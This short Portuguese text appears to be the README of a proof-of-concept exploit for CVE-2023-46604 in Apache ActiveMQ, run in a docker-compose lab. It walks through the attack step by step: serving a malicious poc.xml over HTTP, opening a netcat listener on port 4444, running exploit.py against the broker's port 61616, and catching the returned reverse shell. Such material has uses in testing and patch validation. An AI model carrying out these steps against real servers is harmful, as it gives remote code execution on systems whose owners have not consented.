
Exploit PoC para CVE-2023-46604 visando Apache ActiveMQ, entregando um reverse shell através de uma carga XML manipulada via HTTP.
CVE-2023-46604

Monte o docker-compose com 2 imagens, incluindo a máquina vítima e a máquina alvo, de acordo com o ambiente necessário. Na máquina vítima, inicie o ActiveMQ.
Mude para a máquina atacante: • Abra o serviço HTTP para enviar o PoC: python3 -m http.server
• Use o netcat para escutar a conexão com a máquina atacante: nc -nlvp 4444
• Envie o payload para criar uma conexão reverse shell para a máquina atacante: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Onde:
Pode-se observar que, após executar o comando para executar o arquivo 'exploit.py', o código de exploração envia um pacote 'poc.xml' no servidor web para o alvo, que é o endereço do serviço ActiveMQ em execução no servidor alvo. Ao mesmo tempo, o servidor web HTTP na máquina atacante também recebe a requisição enviada a partir do endereço IP da máquina alvo.
Após enviar o payload, mude para o terminal que está escutando na porta 4444 da máquina atacante. Vemos que o reverse shell da máquina vítima foi enviado de volta.